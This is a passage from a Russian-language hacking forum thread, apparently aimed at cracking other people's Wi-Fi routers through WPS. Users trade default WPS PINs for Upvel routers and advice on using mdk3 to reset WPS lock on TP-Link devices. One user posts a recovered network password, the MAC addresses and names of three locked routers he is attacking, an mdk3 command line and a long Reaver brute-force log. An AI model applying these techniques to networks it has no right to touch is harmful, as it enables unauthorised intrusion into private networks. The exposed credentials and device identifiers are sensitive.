HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Беспроводные технологии/Wi-Fi/Wardriving
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2321  
Старый 12.01.2015, 02:33
VladimirV
Познавший АНТИЧАТ
Регистрация: 01.04.2013
Сообщений: 1,113
Провел на форуме:
348572

Репутация: 57


По умолчанию

Цитата:
Сообщение от Wirexia  

Поломал я сеть...оказался это UR-325BN компании Upvel,пароль сети оказался просто крутым:z7staE2H ну а пинкод 20854836 подобрался очень быстро,сначало до 10% а потом резкий прыжок до 90% и после 2 часть за 30 мин подобрал,все таки ривер пропустил один или более пакет(ов)

Но вопрос по поводу Wps Lock остается в силе

Это один из постоянных пинов для:

Upvel UR-315BN Wireless Router

Upvel UR-325BN Wireless Router

Думаю если Вы спросили пин к маку то Вам его подсказали.
 
Ответить с цитированием

  #2322  
Старый 12.01.2015, 10:22
Wirexia
New Member
Регистрация: 10.01.2013
Сообщений: 14
Провел на форуме:
3510

Репутация: 0
По умолчанию

Цитата:
Сообщение от VladimirV  

Это один из постоянных пинов для:

Upvel UR-315BN Wireless Router

Upvel UR-325BN Wireless Router

Думаю если Вы спросили пин к маку то Вам его подсказали.

Причем тут мак и пин?)

Почитайте мои пост еще раз,разве я написал что я взял и спросил у кого то?))) Мрак))))
 
Ответить с цитированием

  #2323  
Старый 12.01.2015, 19:32
4pips
Elder - Старейшина
Регистрация: 15.09.2013
Сообщений: 529
Провел на форуме:
124918

Репутация: 40
По умолчанию

Wirexia

Да, возможно VladimirV выразился недостаточно четко для вас. И я слишком мягко интересовался, какое у вас там устройство. Если бы вы сообщили первую половину его мак-адреса (так называемую OUI), то многие бы вам тут ответили, какой пин пробовать.

http://forum.antichat.ru/showthread.php?p=3758902-20854836#post3758902

Но вы самостоятельно нашли этот известный пин. Ведь мог бы быть и не он.
 
Ответить с цитированием

  #2324  
Старый 12.01.2015, 22:29
Wirexia
New Member
Регистрация: 10.01.2013
Сообщений: 14
Провел на форуме:
3510

Репутация: 0
По умолчанию

Цитата:
Сообщение от 4pips  

Wirexia

Да, возможно VladimirV выразился недостаточно четко для вас. И я слишком мягко интересовался, какое у вас там устройство. Если бы вы сообщили первую половину его мак-адреса (так называемую OUI), то многие бы вам тут ответили, какой пин пробовать.

http://forum.antichat.ru/showthread.php?p=3758902-20854836#post3758902

Но вы самостоятельно нашли этот известный пин. Ведь мог бы быть и не он.

Мрак,а что то по моему вопросу с WPS locked yes у вас есть?)
 
Ответить с цитированием

  #2325  
Старый 12.01.2015, 23:02
4pips
Elder - Старейшина
Регистрация: 15.09.2013
Сообщений: 529
Провел на форуме:
124918

Репутация: 40
По умолчанию

Цитата:
Сообщение от Wirexia  

Мрак,а что то по моему вопросу с WPS locked yes у вас есть?)

Если устройства от tp-link, то на некоторых из них можно принудительно перегружать wi-fi модуль (т.е. сбрасывать lock) с помощью mdk3. Не на всех получится, но известны мак-адреса, на которых получалось. Устройства других производителей на mdk3 не реагируют или просто еще не найдены. У некоторых lock временный, у некоторых до перезагрузки. На некоторых устройствах чтобы избежать залочивания, нужно пробовать пин не чаще чем раз в 60 секунд. Задавая вопрос, очень желательно указывать производителя устройства или давать первую половину мак-адреса (OUI). По ней легко узнать производителя, например тут: https://www.wireshark.org/tools/oui-lookup.html
 
Ответить с цитированием

  #2326  
Старый 13.01.2015, 17:13
Wirexia
New Member
Регистрация: 10.01.2013
Сообщений: 14
Провел на форуме:
3510

Репутация: 0
По умолчанию

Цитата:
Сообщение от 4pips  

Если устройства от tp-link, то на некоторых из них можно принудительно перегружать wi-fi модуль (т.е. сбрасывать lock) с помощью mdk3. Не на всех получится, но известны мак-адреса, на которых получалось. Устройства других производителей на mdk3 не реагируют или просто еще не найдены. У некоторых lock временный, у некоторых до перезагрузки. На некоторых устройствах чтобы избежать залочивания, нужно пробовать пин не чаще чем раз в 60 секунд. Задавая вопрос, очень желательно указывать производителя устройства или давать первую половину мак-адреса (OUI). По ней легко узнать производителя, например тут: https://www.wireshark.org/tools/oui-lookup.html

E8:94:F6:73:3E:E2 alert_5 (wps locked) (Results

E8:94:F6 TP-LINK TECHNOLOGIES CO.,LTD.)

CO:4A:00:49:A5:06 Tp-Link 1043 (wps locked)

CO:4A:00:5F:88:86 DOMA (wps locked )

Очень бы был признателен вам если подскажите пин или метод снятия wps лока)

Из трех мак адресо только первый я нашел что он тп линк...и то незнаю правильно или нет...
 
Ответить с цитированием

  #2327  
Старый 13.01.2015, 17:42
4pips
Elder - Старейшина
Регистрация: 15.09.2013
Сообщений: 529
Провел на форуме:
124918

Репутация: 40
По умолчанию

Буквы О в мак-адресе быть не может, правильно C0:4A:00

У tp-link пины без системы - никто не подскажет (возможно очень давно все же была система, потому встречается крайне редко).

А для снятия лока и подбора нужно запускать скрипт.

Текст скрипта немного раличается в зависимости от того, какой сборкой Linux вы пользуетесь. Наиболее популярные wifislax и Kali. Для них в этой ветке ранее приводились тексты скриптов - можно найти, в крайнем случае кто-нибудь повторит, подскажи название сборки.
 
Ответить с цитированием

  #2328  
Старый 13.01.2015, 18:19
Wirexia
New Member
Регистрация: 10.01.2013
Сообщений: 14
Провел на форуме:
3510

Репутация: 0
По умолчанию

Цитата:
Сообщение от 4pips  

Буквы О в мак-адресе быть не может, правильно C0:4A:00

У tp-link пины без системы - никто не подскажет (возможно очень давно все же была система, потому встречается крайне редко).

А для снятия лока и подбора нужно запускать скрипт.

Текст скрипта немного раличается в зависимости от того, какой сборкой Linux вы пользуетесь. Наиболее популярные wifislax и Kali. Для них в этой ветке ранее приводились тексты скриптов - можно найти, в крайнем случае кто-нибудь повторит, подскажи название сборки.

у меня backtrack5 r3 пробовал я md3 долбить эти три точки) пользовался командой md3 интерфейс(использовал mon0,1,2) x 0 -t bssid -n essid -s 500 (по началу 200 использовал)

Исправил и узнал что это все 3 тп линка

E8:94:F6:73:3E:E2 alert_5 (wps locked) (Results

E8:94:F6 TP-LINK TECHNOLOGIES CO.,LTD.)

C0:4A:00:49:A5:06 Tp-Link 1043 (wps locked) TP-Link

C0:4A:00:5F:88:86 DOMA (wps locked ) Tp-Link

а вот модели незнаю да и сама база незнает)
 
Ответить с цитированием

  #2329  
Старый 13.01.2015, 20:44
4pips
Elder - Старейшина
Регистрация: 15.09.2013
Сообщений: 529
Провел на форуме:
124918

Репутация: 40
По умолчанию

По ссылке сообщение с двумя скриптами. Первый для wifislax, второй для kali (бывший BackTrack). Чем чётче будут вопросы, тем чётче могут быть ответы. У меня был опыт только в wifislax.

http://forum.antichat.ru/showpost.php?p=3760910&postcount=2082
 
Ответить с цитированием

  #2330  
Старый 13.01.2015, 21:49
Wirexia
New Member
Регистрация: 10.01.2013
Сообщений: 14
Провел на форуме:
3510

Репутация: 0
По умолчанию

Цитата:
Сообщение от 4pips  

По ссылке сообщение с двумя скриптами. Первый для wifislax, второй для kali (бывший BackTrack). Чем чётче будут вопросы, тем чётче могут быть ответы. У меня был опыт только в wifislax.

http://forum.antichat.ru/showpost.php?p=3760910&postcount=2082

Reaver v1.4 WiFi Protected Setup Attack Tool

Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

[+] Restored previous session

[+] Waiting for beacon from E8:94:F6:73:3E:E2

[+] Switching mon0 to channel 3

[+] Associated with E8:94:F6:73:3E:E2 (ESSID: alert_5)

[+] Trying pin 88885674

[+] Switching mon0 to channel 1

[+] Switching mon0 to channel 3

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x03), re-trying last pin

[+] Trying pin 88885674

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x03), re-trying last pin

[+] Trying pin 88885674

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[!] WARNING: Receive timeout occurred

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x02), re-trying last pin

[+] Trying pin 88885674

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x03), re-trying last pin

^C

[+] Session saved.

[+] Mdk3 is working ...

[+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C]

уже 6 раз перезапускал на ctrl+c и ничего
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.